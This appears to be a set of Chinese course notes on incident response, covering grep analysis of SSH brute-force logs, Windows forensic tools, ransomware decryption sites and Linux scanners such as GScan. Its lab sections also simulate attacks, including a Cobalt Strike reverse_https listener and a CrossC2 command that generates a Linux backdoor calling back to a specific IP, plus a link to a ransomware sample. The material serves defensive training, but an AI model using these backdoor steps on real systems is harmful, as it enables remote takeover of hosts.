常见日志类别及存储:
补充资料:
病毒分析:
病毒查杀:
病毒动态:
在线病毒扫描网站:
本课重点:
Windows-LogFusion 载入查看:
事件归类,事件 ID,事件状态等,参考百度资料
Linux-grep 筛选:
1、统计了下日志,确认服务器遭受多少次暴力破解
grep -o "Failed password" /var/log/secure|uniq -c
2、输出登录爆破的第一行和最后一行,确认爆破时间范围:
grep "Failed password" /var/log/secure|head -1
grep "Failed password" /var/log/secure|tail -1
3、进一步定位有哪些 IP 在爆破?
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-
4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0- 9]?)"|uniq -c | sort -nr
4、爆破用户名字典都有哪些?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -
nr
5、登录成功的日期、用户名、IP:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
案例演示1-windows日志查看
windows日志位置
windows自带日志工具不好用,查找分析不方便,推荐使用插件LogFusion
<1>LogFusion载入应用程序、硬件事件、安全、系统等日志
<2>使用弱口令工具进行暴力破解(选择RDP协议),模拟攻击
<3>在安全日志里看到很多账户登录失败的日志,可以判断当前主机遭受了爆破攻击,以及是否成功等
<4>双击进入,查看详细信息(可以看到是哪个IP地址爆破密码成功,成功登录了本机)
案例演示2-linux日志查看
linux日志位置
<1>首先使用弱口令工具进行暴力破解(选择SSH协议),模拟攻击
<2>linux日志分析,使用grep筛选
windows:默认配置测试
linux 借助 CrossC2 项目:netstat -ntulp
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon
参考过程:http://www.adminxe.com/1287.html
1.项目上传至服务端目录,给予执行权限
2.配置监听器:
windows/beacon_https/reverse_https 阿里云记得端口放行
3.生成后门:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
通过网络监听工具及 windows 日志分析或执行记录查找后门问题
案例演示1-windows分析
<1>windows执行木马,CS上线,模拟攻击
<2>TCPView工具,可以查看哪个进程与远程IP通信过,从而确定系统是否曾经遭受过攻击。但是这个软件不太好用,上一步执行过的artifact.exe木马都没筛选出来。
<3>Process Explorer工具,可以查看分析进程
<4>PCHunter工具。缺点是,windows高版本网络信息,获取不全。比如木马在windows7执行后,该工具可以获取网络信息,如下图。但是同一木马在windows2018执行后,该工具获取不到网络信息。
<5>UserAssistView工具,可以看到所有在windows系统上执行过的文件
<6>logonsession工具,可以看到当前主机有哪些会话连接过,从而分析有没有过远程攻击
<7>autoruns工具,可以查看windows系统的自启动项目,从而发现是否有木马病毒等
案例演示2-linux分析
CS是windows渗透工具,但是后期经过一些插件的开发,CS也可以上线linux系统,比如CS借助CrossC2项目上线linux主机
<1>项目上传至服务端目录,给予执行权限
<2>配置监听器:windows/beacon_https/reverse_https 阿里云记得端口放行
<3>生成后门:./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
<4>将后门上传到linux主机并执行
<5>CS成功上线
<6>接下来就是分析日志,查找后门等,具体可见案例4。
详细说明中毒表现及恢复指南
推荐2个勒索病毒解密网站
https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html
案例演示
<1>下载勒索病毒样本,在虚拟机上执行(不要在本机执行,谨慎执行)
<2>中毒后显示如下
<3>打开任何文件都乱码,弹框
<4>可以使用360勒索病毒解密网站进行病毒查询、在线解密等。
安全卫士勒索病毒专题:文件恢复_安全卫士离线救灾版_文档卫士 (360.cn)
<5>也可以使用nomoreransom网站尝试解密。https://www.nomoreransom.org/zh/index.html
参考:https://github.com/grayddq/GScan/
自动化响应检测工具:GScan、chkrootkit、rkhunter、lynis
都下载一下,应急响应时全都跑一遍
案例演示
<1>执行Gscan脚本
<2>可以看到,黑客进行了哪些攻击行为,是否成功等。
<3>netstat -ntl可以查看tcp端口等,再通过ps命令找到对应的进程,分析其是否是木马病毒
涉及资源:
https://xz.aliyun.com/t/485# 先知汇总应急响应文章
https://lesuobingdu.360.cn/ #360勒索解密网站
https://github.com/gloxec/CrossC2/ #CrossC2工具
https://github.com/darkr4y/geacon/
https://github.com/grayddq/GScan/ #对Linux主机排查时提供便利
https://bbs.pediy.com/thread-217586-1.htm #永恒之蓝样本(勒索病毒)
https://www.nomoreransom.org/zh/index.html #解锁勒索病毒
https://docs.microsoft.com/en-us/sysinternals/ #window 官网的安全分析文件
https://www.secpulse.com/archives/114019.html #全Windows安全工具锦集
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取码:xiao